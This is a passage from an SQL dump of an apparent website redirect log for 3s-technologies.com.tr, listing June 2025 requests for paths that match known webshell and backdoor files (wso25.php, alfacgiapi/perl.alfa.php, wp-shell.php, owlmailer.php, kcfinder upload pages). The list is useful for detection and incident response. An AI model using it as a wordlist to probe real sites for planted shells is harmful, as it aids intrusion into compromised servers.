00:00:00',301),(40314,'http://3s-technologies.com.tr/tr/wp-content/plugins/core-plugin/smaxx.php',NULL,'','',8,0,'2025-06-07 05:39:01','0000-00-00 00:00:00',301),(40315,'http://3s-technologies.com.tr/tr/wp-includes/smaxx.php',NULL,'','',8,0,'2025-06-07 05:39:02','0000-00-00 00:00:00',301),(40316,'http://3s-technologies.com.tr/tr/wp-content/plugins/smaxx.php',NULL,'','',8,0,'2025-06-07 05:39:02','0000-00-00 00:00:00',301),(40317,'http://3s-technologies.com.tr/tr/xt/smaxx.php',NULL,'','',8,0,'2025-06-07 05:39:02','0000-00-00 00:00:00',301),(40318,'http://3s-technologies.com.tr/tr/wp-content/smaxx.php',NULL,'','',8,0,'2025-06-07 05:39:03','0000-00-00 00:00:00',301),(40319,'http://3s-technologies.com.tr/tr/wp-content/themes/twentyfive/smaxx.php',NULL,'','',9,0,'2025-06-07 05:39:03','0000-00-00 00:00:00',301),(40320,'http://3s-technologies.com.tr/tr/wp-includes/id3/sx.php',NULL,'','',8,0,'2025-06-07 05:39:05','0000-00-00 00:00:00',301),(40321,'http://3s-technologies.com.tr/tr/wp-includes/blocks/sx.php',NULL,'','',8,0,'2025-06-07 05:39:05','0000-00-00 00:00:00',301),(40322,'http://3s-technologies.com.tr/tr/wp-includes/sx.php',NULL,'','',8,0,'2025-06-07 05:39:06','0000-00-00 00:00:00',301),(40323,'http://3s-technologies.com.tr/tr/wp-admin/sx.php',NULL,'','',8,0,'2025-06-07 05:39:06','0000-00-00 00:00:00',301),(40324,'http://3s-technologies.com.tr/tr/wp-content/plugins/fix/sx.php',NULL,'','',10,0,'2025-06-07 05:39:07','0000-00-00 00:00:00',301),(40325,'http://3s-technologies.com.tr/tr/wp-admin/includes/sx.php',NULL,'','',8,0,'2025-06-07 05:39:07','0000-00-00 00:00:00',301),(40326,'http://3s-technologies.com.tr/tr/cgi-bin/sx.php',NULL,'','',6,0,'2025-06-07 05:39:08','0000-00-00 00:00:00',301),(40327,'http://3s-technologies.com.tr/tr/wp-admin/css/sx.php',NULL,'','',8,0,'2025-06-07 05:39:08','0000-00-00 00:00:00',301),(40328,'http://3s-technologies.com.tr/tr/wp-admin/network/sx.php',NULL,'','',8,0,'2025-06-07 05:39:08','0000-00-00 00:00:00',301),(40329,'http://3s-technologies.com.tr/tr/wp-includes/block-supports/sx.php',NULL,'','',8,0,'2025-06-07 05:39:09','0000-00-00 00:00:00',301),(40330,'http://3s-technologies.com.tr/tr/wp-includes/ixr/sx.php',NULL,'','',8,0,'2025-06-07 05:39:09','0000-00-00 00:00:00',301),(40331,'http://3s-technologies.com.tr/tr/.well-known/sx.php',NULL,'','',8,0,'2025-06-07 05:39:10','0000-00-00 00:00:00',301),(40332,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/skins/lightgray/fonts/sx.php',NULL,'','',8,0,'2025-06-07 05:39:10','0000-00-00 00:00:00',301),(40333,'http://3s-technologies.com.tr/tr/wp-content/sx.php',NULL,'','',9,0,'2025-06-07 05:39:10','0000-00-00 00:00:00',301),(40334,'http://3s-technologies.com.tr/tr/wp-content/plugins/elementor/sx.php',NULL,'','',8,0,'2025-06-07 05:39:11','0000-00-00 00:00:00',301),(40335,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/sx.php',NULL,'','',8,0,'2025-06-07 05:39:11','0000-00-00 00:00:00',301),(40336,'http://3s-technologies.com.tr/tr/wp-includes/js/jcrop/sx.php',NULL,'','',8,0,'2025-06-07 05:39:12','0000-00-00 00:00:00',301),(40337,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/sx.php',NULL,'','',8,0,'2025-06-07 05:39:12','0000-00-00 00:00:00',301),(40338,'http://3s-technologies.com.tr/tr/wp-admin/images/sx.php',NULL,'','',8,0,'2025-06-07 05:39:13','0000-00-00 00:00:00',301),(40339,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/blue.php',NULL,'','',10,0,'2025-06-07 05:39:13','0000-00-00 00:00:00',301),(40340,'http://3s-technologies.com.tr/tr/wp-content/themes/wp-classic/inc/index.php',NULL,'','',8,0,'2025-06-07 05:39:17','0000-00-00 00:00:00',301),(40341,'http://3s-technologies.com.tr/tr/wp-content/plugins/wordpresscore/blkfqnikz.php',NULL,'','',8,0,'2025-06-07 05:39:31','0000-00-00 00:00:00',301),(40342,'http://3s-technologies.com.tr/tr/wp/wp-admin/includes/class-wp-page-mvb2yr.php',NULL,'','',8,0,'2025-06-07 05:39:31','0000-00-00 00:00:00',301),(40343,'http://3s-technologies.com.tr/tr/wp-content/style-css.php',NULL,'','',15,0,'2025-06-07 05:39:34','0000-00-00 00:00:00',301),(40344,'http://3s-technologies.com.tr/tr/wordpress/wp-includes/ixr/allez.php',NULL,'','',14,0,'2025-06-07 05:39:36','0000-00-00 00:00:00',301),(40345,'http://3s-technologies.com.tr/tr/rendixd.php',NULL,'','',9,0,'2025-06-07 05:39:36','0000-00-00 00:00:00',301),(40346,'http://3s-technologies.com.tr/tr/filefuns.php',NULL,'','',16,0,'2025-06-07 05:39:37','0000-00-00 00:00:00',301),(40347,'http://3s-technologies.com.tr/tr/.well-known/.well-known/owlmailer.php',NULL,'','',8,0,'2025-06-07 05:39:40','0000-00-00 00:00:00',301),(40348,'http://3s-technologies.com.tr/tr/wp-content/uploads/wp-login.php.suspected',NULL,'','',8,0,'2025-06-07 05:39:42','0000-00-00 00:00:00',301),(40349,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/endpoints/html.php',NULL,'','',8,0,'2025-06-07 05:39:42','0000-00-00 00:00:00',301),(40350,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/cong.php',NULL,'','',8,0,'2025-06-07 05:39:43','0000-00-00 00:00:00',301),(40351,'http://3s-technologies.com.tr/tr/wp-content/uploads/error_log.php',NULL,'','',8,0,'2025-06-07 05:39:46','0000-00-00 00:00:00',301),(40352,'http://3s-technologies.com.tr/tr/wp-includes/sts.php',NULL,'','',8,0,'2025-06-07 05:39:47','0000-00-00 00:00:00',301),(40353,'http://3s-technologies.com.tr/tr/wp-includes/requests/dropdown.php',NULL,'','',8,0,'2025-06-07 05:39:48','0000-00-00 00:00:00',301),(40354,'http://3s-technologies.com.tr/tr/css/sgd.php',NULL,'','',10,0,'2025-06-07 05:39:50','0000-00-00 00:00:00',301),(40355,'http://www.3s-technologies.com.tr/tr/admin/ckeditor/kcfinder/upload.php',NULL,'','',1,0,'2025-06-07 09:23:47','0000-00-00 00:00:00',301),(40356,'http://www.3s-technologies.com.tr/tr/assets/ckeditor/kcfinder/upload.php',NULL,'','',1,0,'2025-06-07 09:23:50','0000-00-00 00:00:00',301),(40357,'https://3s-technologies.com.tr/wp-admin/.wp-admin.php?slince_golden=true&is=@ikisifre&m=hqv_',NULL,'www.google.com','',1,0,'2025-06-07 15:01:01','0000-00-00 00:00:00',301),(40358,'https://3s-technologies.com.tr/wp-content/.wp-content.php?slince_golden=true&is=@ikisifre&m=gvj_',NULL,'www.google.com','',1,0,'2025-06-07 15:01:01','0000-00-00 00:00:00',301),(40359,'https://3s-technologies.com.tr/wp-includes/.wp-includes.php?slince_golden=true&is=@ikisifre&m=gow_',NULL,'www.google.com','',1,0,'2025-06-07 15:01:02','0000-00-00 00:00:00',301),(40360,'https://3s-technologies.com.tr/index.php/en/products/screen-printer/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-08 09:56:44','0000-00-00 00:00:00',301),(40361,'https://3s-technologies.com.tr/tr/?task=add&controller=tag&option=com_tag',NULL,'','',1,0,'2025-06-10 07:32:23','0000-00-00 00:00:00',301),(40362,'https://3s-technologies.com.tr/tr/?option=com_tag&controller=tag&task=add',NULL,'','',1,0,'2025-06-10 15:03:32','0000-00-00 00:00:00',301),(40363,'https://3s-technologies.com.tr/tr/?controller=tag&option=com_tag&task=add',NULL,'','',1,0,'2025-06-11 07:04:15','0000-00-00 00:00:00',301),(40364,'http://3s-technologies.com.tr/tr/assets/upload/alfa_data/alfacgiapi',NULL,'http://3s-technologies.com.tr/assets/upload/ALFA_DATA/alfacgiapi/','',3,0,'2025-06-11 17:14:05','0000-00-00 00:00:00',301),(40365,'http://3s-technologies.com.tr/tr/wp-admin/alfacgiapi',NULL,'http://3s-technologies.com.tr/wp-admin/alfacgiapi/','',3,0,'2025-06-11 17:14:05','0000-00-00 00:00:00',301),(40366,'http://3s-technologies.com.tr/tr/.well-known/alfa_data/alfacgiapi',NULL,'http://3s-technologies.com.tr/.well-known/ALFA_DATA/alfacgiapi/','',3,0,'2025-06-11 17:14:05','0000-00-00 00:00:00',301),(40367,'http://3s-technologies.com.tr/tr/tmp_images/alfacgiapi',NULL,'http://3s-technologies.com.tr/tmp_images/alfacgiapi/','',3,0,'2025-06-11 17:14:05','0000-00-00 00:00:00',301),(40368,'http://3s-technologies.com.tr/tr/files/alfa_data/alfacgiapi',NULL,'http://3s-technologies.com.tr/files/ALFA_DATA/alfacgiapi/','',4,0,'2025-06-11 17:14:05','0000-00-00 00:00:00',301),(40369,'http://3s-technologies.com.tr/tr/wp-admin/css/about.php/alfacgiapi',NULL,'http://3s-technologies.com.tr/wp-admin/css/about.php/alfacgiapi/','',8,0,'2025-06-11 17:14:06','0000-00-00 00:00:00',301),(40370,'http://3s-technologies.com.tr/tr/images/alfa_data/alfacgiapi',NULL,'http://3s-technologies.com.tr/images/ALFA_DATA/alfacgiapi/','',3,0,'2025-06-11 17:14:06','0000-00-00 00:00:00',301),(40371,'http://3s-technologies.com.tr/tr/cgi-bin/alfa_data/alfacgiapi',NULL,'http://3s-technologies.com.tr/cgi-bin/ALFA_DATA/alfacgiapi/','',1,0,'2025-06-11 17:14:06','0000-00-00 00:00:00',301),(40372,'http://3s-technologies.com.tr/tr/gdftps.php',NULL,'','',10,0,'2025-06-12 04:31:30','0000-00-00 00:00:00',301),(40373,'http://3s-technologies.com.tr/tr/as4aapasd.php',NULL,'','',9,0,'2025-06-12 04:31:44','0000-00-00 00:00:00',301),(40374,'http://3s-technologies.com.tr/tr/wp-content/plugins/revsliderswp/wp-login.php',NULL,'','',1,0,'2025-06-12 04:31:51','0000-00-00 00:00:00',301),(40375,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ectoplasm/my1.php',NULL,'','',4,0,'2025-06-12 08:28:30','0000-00-00 00:00:00',301),(40376,'http://3s-technologies.com.tr/tr/wp-admin/includes/inputs.php',NULL,'','',4,0,'2025-06-12 08:28:32','0000-00-00 00:00:00',301),(40377,'http://3s-technologies.com.tr/tr/wp-includes/langar.php',NULL,'','',4,0,'2025-06-12 08:28:35','0000-00-00 00:00:00',301),(40378,'http://3s-technologies.com.tr/tr/wp-content/themes/fitnessbase/404.php?ok',NULL,'','',10,0,'2025-06-12 08:28:37','0000-00-00 00:00:00',301),(40379,'http://3s-technologies.com.tr/tr/index/wp-error_log.php',NULL,'','',4,0,'2025-06-12 08:28:42','0000-00-00 00:00:00',301),(40380,'http://3s-technologies.com.tr/tr/cgi-bin/file.php',NULL,'','',10,0,'2025-06-12 08:28:43','0000-00-00 00:00:00',301),(40381,'http://3s-technologies.com.tr/tr/wp-content/plugins/html404/wso25.php',NULL,'','',7,0,'2025-06-12 08:28:43','0000-00-00 00:00:00',301),(40382,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/index.php',NULL,'','',5,0,'2025-06-12 08:28:47','0000-00-00 00:00:00',301),(40383,'http://3s-technologies.com.tr/tr/nvedxsgptyq.php',NULL,'','',5,0,'2025-06-12 08:28:52','0000-00-00 00:00:00',301),(40384,'http://3s-technologies.com.tr/tr/wp-content/plugins/hellopress/wp_mna.php',NULL,'','',22,0,'2025-06-12 08:28:58','0000-00-00 00:00:00',301),(40385,'http://3s-technologies.com.tr/tr/nowpf.php',NULL,'','',5,0,'2025-06-12 08:29:00','0000-00-00 00:00:00',301),(40386,'http://3s-technologies.com.tr/tr/es-ar/wp-content/admin.php',NULL,'','',4,0,'2025-06-12 08:29:01','0000-00-00 00:00:00',301),(40387,'http://3s-technologies.com.tr/tr/wp-content/uploads/ms-sites-modify.php',NULL,'','',4,0,'2025-06-12 08:29:04','0000-00-00 00:00:00',301),(40388,'http://3s-technologies.com.tr/tr/wp-content/plugins/elementor/includes/settings',NULL,'','',4,0,'2025-06-12 08:29:06','0000-00-00 00:00:00',301),(40389,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/moon.php',NULL,'','',4,0,'2025-06-12 08:29:07','0000-00-00 00:00:00',301),(40390,'http://3s-technologies.com.tr/tr/wp-admin/plugins',NULL,'','',5,0,'2025-06-12 08:29:09','0000-00-00 00:00:00',301),(40391,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/skins/lightgray/img',NULL,'','',4,0,'2025-06-12 08:29:12','0000-00-00 00:00:00',301),(40392,'http://3s-technologies.com.tr/tr/wp-content/uploads/wp-shell.php',NULL,'','',4,0,'2025-06-12 08:29:22','0000-00-00 00:00:00',301),(40393,'http://3s-technologies.com.tr/tr/wp-content/plugins/one-click-demo-import/about.php',NULL,'','',4,0,'2025-06-12 08:29:24','0000-00-00 00:00:00',301),(40394,'http://3s-technologies.com.tr/tr/wp-includes/ixr/install.php',NULL,'','',4,0,'2025-06-12 08:29:25','0000-00-00 00:00:00',301),(40395,'http://3s-technologies.com.tr/tr/wp-includes/widgets/xbrain.php',NULL,'','',4,0,'2025-06-12 08:29:33','0000-00-00 00:00:00',301),(40396,'http://3s-technologies.com.tr/tr/cgi-bin/my1.php',NULL,'','',3,0,'2025-06-12 08:29:35','0000-00-00 00:00:00',301),(40397,'http://3s-technologies.com.tr/tr/wp-includes/blocks/social-links',NULL,'','',7,0,'2025-06-12 08:29:37','0000-00-00 00:00:00',301),(40398,'http://3s-technologies.com.tr/tr/wp-includes/php-compat/admiin.php',NULL,'','',4,0,'2025-06-12 08:29:41','0000-00-00 00:00:00',301),(40399,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-help',NULL,'','',5,0,'2025-06-12 08:29:46','0000-00-00 00:00:00',301),(40400,'http://3s-technologies.com.tr/tr/x2.php',NULL,'','',4,0,'2025-06-12 08:29:47','0000-00-00 00:00:00',301),(40401,'http://3s-technologies.com.tr/tr/alfacgiapi/perl.alfa.php',NULL,'','',7,0,'2025-06-12 08:29:49','0000-00-00 00:00:00',301),(40402,'http://3s-technologies.com.tr/tr/smg.php',NULL,'','',4,0,'2025-06-12 08:29:51','0000-00-00 00:00:00',301),(40403,'http://3s-technologies.com.tr/tr/ro1geujydnz.php',NULL,'','',4,0,'2025-06-12 08:29:53','0000-00-00 00:00:00',301),(40404,'http://3s-technologies.com.tr/tr/wp-content/themes/divi/includes/builder/frontend-builder/assets/vendors/plugins/fullscreen',NULL,'','',5,0,'2025-06-12 08:29:58','0000-00-00 00:00:00',301),(40405,'http://3s-technologies.com.tr/tr/wp-content/mu-plugins/item.php',NULL,'','',4,0,'2025-06-12 08:30:03','0000-00-00 00:00:00',301),(40406,'http://3s-technologies.com.tr/tr/wp-content/plugins/cekidot/alf.php',NULL,'','',7,0,'2025-06-12 08:30:03','0000-00-00 00:00:00',301),(40407,'http://3s-technologies.com.tr/tr/wp-includes/mojhlewjbrg.php',NULL,'','',4,0,'2025-06-12 08:30:04','0000-00-00 00:00:00',301),(40408,'http://3s-technologies.com.tr/tr/wp-includes/js/text.php',NULL,'','',4,0,'2025-06-12 08:30:06','0000-00-00 00:00:00',301),(40409,'http://3s-technologies.com.tr/tr/wp-includes/k19vsjmkect.php',NULL,'','',4,0,'2025-06-12 08:30:14','0000-00-00 00:00:00',301),(40410,'http://3s-technologies.com.tr/tr/assets/xp.php',NULL,'','',4,0,'2025-06-12 08:30:16','0000-00-00 00:00:00',301),(40411,'http://3s-technologies.com.tr/tr/wp-content/plugins/seo-by-rank-math/wp-casper.php',NULL,'','',4,0,'2025-06-12 08:30:18','0000-00-00 00:00:00',301),(40412,'http://3s-technologies.com.tr/tr/wp-includes/id3/module.audio-video.matroska-meta.php',NULL,'','',4,0,'2025-06-12 08:30:19','0000-00-00 00:00:00',301),(40413,'http://3s-technologies.com.tr/tr/.well-known/alfa_data/alfacgiapi/perl.alfa.php',NULL,'','',8,0,'2025-06-12 08:30:23','0000-00-00 00:00:00',301),(40414,'http://3s-technologies.com.tr/tr/cgi-bin/cgi-bin/about.php',NULL,'','',4,0,'2025-06-12 08:30:24','0000-00-00 00:00:00',301),(40415,'http://3s-technologies.com.tr/tr/wp-admin/cux.php',NULL,'','',4,0,'2025-06-12 08:30:29','0000-00-00 00:00:00',301),(40416,'http://3s-technologies.com.tr/tr/ggfi.php',NULL,'','',9,0,'2025-06-12 08:30:33','0000-00-00 00:00:00',301),(40417,'http://3s-technologies.com.tr/tr/wp-includes/js/dist/vendor',NULL,'','',24,0,'2025-06-12 08:30:34','0000-00-00 00:00:00',301),(40418,'http://3s-technologies.com.tr/tr/wp-admin/sodcbgsftla.php',NULL,'','',4,0,'2025-06-12 08:30:34','0000-00-00 00:00:00',301),(40419,'http://3s-technologies.com.tr/tr/wp-includes/blocks/list/index.php?p=',NULL,'','',4,0,'2025-06-12 08:30:37','0000-00-00 00:00:00',301),(40420,'http://3s-technologies.com.tr/tr/wp-includes/bndzcrqfp96.php',NULL,'','',4,0,'2025-06-12 08:30:39','0000-00-00 00:00:00',301),(40421,'http://3s-technologies.com.tr/tr/api.php',NULL,'','',39,0,'2025-06-12 08:30:40','0000-00-00 00:00:00',301),(40422,'http://3s-technologies.com.tr/tr/wp-content/plugins/x/index.php',NULL,'','',4,0,'2025-06-12 08:30:41','0000-00-00 00:00:00',301),(40423,'http://3s-technologies.com.tr/tr/s_ne.php',NULL,'','',7,0,'2025-06-12 08:30:41','0000-00-00 00:00:00',301),(40424,'http://3s-technologies.com.tr/tr/admin/controller/extension/extension/index.php',NULL,'','',5,0,'2025-06-12 08:30:46','0000-00-00 00:00:00',301),(40425,'http://3s-technologies.com.tr/tr/wp-content/languages/ebbqvixwm.php',NULL,'','',4,0,'2025-06-12 08:30:47','0000-00-00 00:00:00',301),(40426,'http://3s-technologies.com.tr/tr/wp-admin/images/layout.php',NULL,'','',4,0,'2025-06-12 08:30:48','0000-00-00 00:00:00',301),(40427,'http://3s-technologies.com.tr/tr/wp-includes/624jlhax7f5.php',NULL,'','',4,0,'2025-06-12 08:30:49','0000-00-00 00:00:00',301),(40428,'http://3s-technologies.com.tr/tr/z63.php',NULL,'','',4,0,'2025-06-12 08:30:54','0000-00-00 00:00:00',301),(40429,'http://3s-technologies.com.tr/tr/wp-includes/images/media/ben.php',NULL,'','',4,0,'2025-06-12 08:30:56','0000-00-00 00:00:00',301),(40430,'http://3s-technologies.com.tr/tr/wp-content/uploads/2023/05/autoload_classmap.php',NULL,'','',5,0,'2025-06-12 08:30:59','0000-00-00 00:00:00',301),(40431,'http://3s-technologies.com.tr/tr/wp-includes/theme-compat/autoload_classmap.php',NULL,'','',6,0,'2025-06-12 08:31:01','0000-00-00 00:00:00',301),(40432,'http://3s-technologies.com.tr/tr/wp-blog-post.php',NULL,'','',7,0,'2025-06-12 08:31:01','0000-00-00 00:00:00',301),(40433,'http://3s-technologies.com.tr/tr/readme.php/wp-includes/text/network.php',NULL,'','',4,0,'2025-06-12 08:31:03','0000-00-00 00:00:00',301),(40434,'http://3s-technologies.com.tr/tr/wp-admin/alfa_data/alfacgiapi/perl.alfa.php',NULL,'','',7,0,'2025-06-12 08:31:04','0000-00-00 00:00:00',301),(40435,'http://3s-technologies.com.tr/tr/wb.php',NULL,'','',32,0,'2025-06-12 08:31:05','0000-00-00 00:00:00',301),(40436,'http://3s-technologies.com.tr/tr/manage.php',NULL,'','',9,0,'2025-06-12 08:31:15','0000-00-00 00:00:00',301),(40437,'http://3s-technologies.com.tr/tr/wp-includes/theme-compat/x2.php',NULL,'','',4,0,'2025-06-12 08:31:18','0000-00-00 00:00:00',301),(40438,'http://3s-technologies.com.tr/tr/wp-includes/bltvybaqncp.php',NULL,'','',4,0,'2025-06-12 08:31:24','0000-00-00 00:00:00',301),(40439,'http://3s-technologies.com.tr/tr/wp-error_log.php',NULL,'','',6,0,'2025-06-12 08:31:24','0000-00-00 00:00:00',301),(40440,'http://3s-technologies.com.tr/tr/wp-content/plugins/elementor/elementor-object.php',NULL,'','',4,0,'2025-06-12 08:31:26','0000-00-00 00:00:00',301),(40441,'http://3s-technologies.com.tr/tr/wp-beckup.php',NULL,'','',7,0,'2025-06-12 08:31:28','0000-00-00 00:00:00',301),(40442,'http://3s-technologies.com.tr/tr/tb.php',NULL,'','',4,0,'2025-06-12 08:31:30','0000-00-00 00:00:00',301),(40443,'http://3s-technologies.com.tr/tr/wp-content/mu-plugins/about.php',NULL,'','',5,0,'2025-06-12 08:31:32','0000-00-00 00:00:00',301),(40444,'http://3s-technologies.com.tr/tr/wp-includes/blocks/shortcode',NULL,'','',5,0,'2025-06-12 08:31:36','0000-00-00 00:00:00',301),(40445,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/content/type/themes.php',NULL,'','',4,0,'2025-06-12 08:31:41','0000-00-00 00:00:00',301),(40446,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/about.php',NULL,'','',4,0,'2025-06-12 08:31:48','0000-00-00 00:00:00',301),(40447,'http://3s-technologies.com.tr/tr/wp-content/plugins/elementor/wp-error_log.php',NULL,'','',4,0,'2025-06-12 08:31:51','0000-00-00 00:00:00',301),(40448,'http://3s-technologies.com.tr/tr/tinyfilemanager',NULL,'','',4,0,'2025-06-12 08:31:54','0000-00-00 00:00:00',301),(40449,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ectoplasm/users.php',NULL,'','',4,0,'2025-06-12 08:31:59','0000-00-00 00:00:00',301),(40450,'http://3s-technologies.com.tr/tr/wp-content/upgrade/admiin.php',NULL,'','',4,0,'2025-06-12 08:32:01','0000-00-00 00:00:00',301),(40451,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/wp-login.php',NULL,'','',4,0,'2025-06-12 08:32:02','0000-00-00 00:00:00',301),(40452,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/cache/hash.php',NULL,'','',4,0,'2025-06-12 08:32:05','0000-00-00 00:00:00',301),(40453,'http://3s-technologies.com.tr/tr/wp-includes/blocks/list',NULL,'','',4,0,'2025-06-12 08:32:08','0000-00-00 00:00:00',301),(40454,'http://3s-technologies.com.tr/tr/wp-admin/plugins/setup',NULL,'','',5,0,'2025-06-12 08:32:08','0000-00-00 00:00:00',301),(40455,'http://3s-technologies.com.tr/tr/s_e.php',NULL,'','',10,0,'2025-06-12 08:32:11','0000-00-00 00:00:00',301),(40456,'http://3s-technologies.com.tr/tr/wp-includes/blocks/comment-template',NULL,'','',6,0,'2025-06-12 08:32:11','0000-00-00 00:00:00',301),(40457,'http://3s-technologies.com.tr/tr/wp-admin/js/themes.php',NULL,'','',14,0,'2025-06-12 08:32:13','0000-00-00 00:00:00',301),(40458,'http://3s-technologies.com.tr/tr/wp-owl.php',NULL,'','',7,0,'2025-06-12 08:32:13','0000-00-00 00:00:00',301),(40459,'http://3s-technologies.com.tr/tr/wp-content/wp-error_log.php',NULL,'','',4,0,'2025-06-12 08:32:16','0000-00-00 00:00:00',301),(40460,'http://3s-technologies.com.tr/tr/wp-content/plugins/ango/sett.php',NULL,'','',5,0,'2025-06-12 08:32:19','0000-00-00 00:00:00',301),(40461,'http://3s-technologies.com.tr/tr/o1j5sbmhlrz.php',NULL,'','',4,0,'2025-06-12 08:32:20','0000-00-00 00:00:00',301),(40462,'http://3s-technologies.com.tr/tr/wp-admin/themes',NULL,'','',4,0,'2025-06-12 08:32:26','0000-00-00 00:00:00',301),(40463,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/themes/inlite',NULL,'','',33,0,'2025-06-12 08:32:28','0000-00-00 00:00:00',301),(40464,'http://3s-technologies.com.tr/tr/wp-includes/requests/response/wp-theme.php',NULL,'','',4,0,'2025-06-12 08:32:28','0000-00-00 00:00:00',301),(40465,'http://3s-technologies.com.tr/tr/nfqjstvuz43.php',NULL,'','',4,0,'2025-06-12 08:32:32','0000-00-00 00:00:00',301),(40466,'http://3s-technologies.com.tr/tr/natural.php',NULL,'','',12,0,'2025-06-12 08:32:32','0000-00-00 00:00:00',301),(40467,'http://3s-technologies.com.tr/tr/wp-includes/requests/admin.php',NULL,'','',4,0,'2025-06-12 08:32:36','0000-00-00 00:00:00',301),(40468,'http://3s-technologies.com.tr/tr/custom-background.php',NULL,'','',7,0,'2025-06-12 08:32:37','0000-00-00 00:00:00',301),(40469,'http://3s-technologies.com.tr/tr/wp-checkbex.php',NULL,'','',4,0,'2025-06-12 08:32:38','0000-00-00 00:00:00',301),(40470,'http://3s-technologies.com.tr/tr/wp-admin/maint/moon.php',NULL,'','',4,0,'2025-06-12 08:32:39','0000-00-00 00:00:00',301),(40471,'http://3s-technologies.com.tr/tr/bqmw.php',NULL,'','',4,0,'2025-06-12 08:32:41','0000-00-00 00:00:00',301),(40472,'http://3s-technologies.com.tr/tr/cux.php',NULL,'','',7,0,'2025-06-12 08:32:43','0000-00-00 00:00:00',301),(40473,'http://3s-technologies.com.tr/tr/wp-includes/jnmrlnqos3b.php',NULL,'','',4,0,'2025-06-12 08:32:44','0000-00-00 00:00:00',301),(40474,'http://3s-technologies.com.tr/tr/wp-includes/images/wp-error_log.php',NULL,'','',4,0,'2025-06-12 08:32:45','0000-00-00 00:00:00',301),(40475,'http://3s-technologies.com.tr/tr/wp-admin/cong.php',NULL,'','',8,0,'2025-06-12 08:32:46','0000-00-00 00:00:00',301),(40476,'http://3s-technologies.com.tr/tr/wp-includes/blocks/table/them/tmpl/index.php?p=',NULL,'','',4,0,'2025-06-12 08:32:48','0000-00-00 00:00:00',301),(40477,'http://3s-technologies.com.tr/tr/wp-includes/style-engine/admin.php',NULL,'','',6,0,'2025-06-12 08:32:52','0000-00-00 00:00:00',301),(40478,'http://3s-technologies.com.tr/tr/wp-includes/blocks/more',NULL,'','',7,0,'2025-06-12 08:32:53','0000-00-00 00:00:00',301),(40479,'http://3s-technologies.com.tr/tr/wp-hoard.php',NULL,'','',14,0,'2025-06-12 08:32:53','0000-00-00 00:00:00',301),(40480,'http://3s-technologies.com.tr/tr/wp-includes/js/crop/admin.php',NULL,'','',4,0,'2025-06-12 08:32:54','0000-00-00 00:00:00',301),(40481,'http://3s-technologies.com.tr/tr/wp-includes/id3/xbrain.php',NULL,'','',4,0,'2025-06-12 08:32:57','0000-00-00 00:00:00',301),(40482,'http://3s-technologies.com.tr/tr/wp-content/themes/digital-download',NULL,'','',4,0,'2025-06-12 08:33:00','0000-00-00 00:00:00',301),(40483,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/fields/admin.php',NULL,'','',4,0,'2025-06-12 08:33:05','0000-00-00 00:00:00',301),(40484,'http://3s-technologies.com.tr/tr/wp-includes/hdkratbguxw.php',NULL,'','',4,0,'2025-06-12 08:33:07','0000-00-00 00:00:00',301),(40485,'http://3s-technologies.com.tr/tr/wp-includes/block-supports/default-constant.php',NULL,'','',4,0,'2025-06-12 08:33:07','0000-00-00 00:00:00',301),(40486,'http://3s-technologies.com.tr/tr/wp-content/plugins/elementor',NULL,'','',6,0,'2025-06-12 08:33:08','0000-00-00 00:00:00',301),(40487,'http://3s-technologies.com.tr/tr/wp-includes/pomo/plugins.php',NULL,'','',10,0,'2025-06-12 08:33:13','0000-00-00 00:00:00',301),(40488,'http://3s-technologies.com.tr/tr/wp-content/uploads/load-scripts-page.php',NULL,'','',4,0,'2025-06-12 08:33:15','0000-00-00 00:00:00',301),(40489,'http://3s-technologies.com.tr/tr/wp-content/uploads/wp-backup.php',NULL,'','',4,0,'2025-06-12 08:33:16','0000-00-00 00:00:00',301),(40490,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/admiin.php',NULL,'','',4,0,'2025-06-12 08:33:17','0000-00-00 00:00:00',301),(40491,'http://3s-technologies.com.tr/tr/pvwdcdf.php',NULL,'','',4,0,'2025-06-12 08:33:19','0000-00-00 00:00:00',301),(40492,'http://3s-technologies.com.tr/tr/wp-includes/style-engine/admiin.php',NULL,'','',4,0,'2025-06-12 08:33:19','0000-00-00 00:00:00',301),(40493,'http://3s-technologies.com.tr/tr/uvrdz.php',NULL,'','',4,0,'2025-06-12 08:33:24','0000-00-00 00:00:00',301),(40494,'http://3s-technologies.com.tr/tr/luxx.php',NULL,'','',4,0,'2025-06-12 08:33:30','0000-00-00 00:00:00',301),(40495,'http://3s-technologies.com.tr/tr/wp-includes/js/crop/about.php',NULL,'','',7,0,'2025-06-12 08:33:31','0000-00-00 00:00:00',301),(40496,'http://3s-technologies.com.tr/tr/wp-includes/wp-error_log.php',NULL,'','',4,0,'2025-06-12 08:33:32','0000-00-00 00:00:00',301),(40497,'http://3s-technologies.com.tr/tr/wp-includes/iwogyaunxnz.php',NULL,'','',4,0,'2025-06-12 08:33:33','0000-00-00 00:00:00',301),(40498,'http://3s-technologies.com.tr/tr/files/alfa_data/alfacgiapi/perl.alfa.php',NULL,'','',7,0,'2025-06-12 08:33:34','0000-00-00 00:00:00',301),(40499,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/components/admin.php',NULL,'','',4,0,'2025-06-12 08:33:37','0000-00-00 00:00:00',301),(40500,'http://3s-technologies.com.tr/tr/wp-includes/assets/cloud.php',NULL,'','',4,0,'2025-06-12 08:33:41','0000-00-00 00:00:00',301),(40501,'http://3s-technologies.com.tr/tr/post.php/wp-includes/requests',NULL,'','',5,0,'2025-06-12 08:33:44','0000-00-00 00:00:00',301),(40502,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/midnight/iusppi.php',NULL,'','',4,0,'2025-06-12 08:33:47','0000-00-00 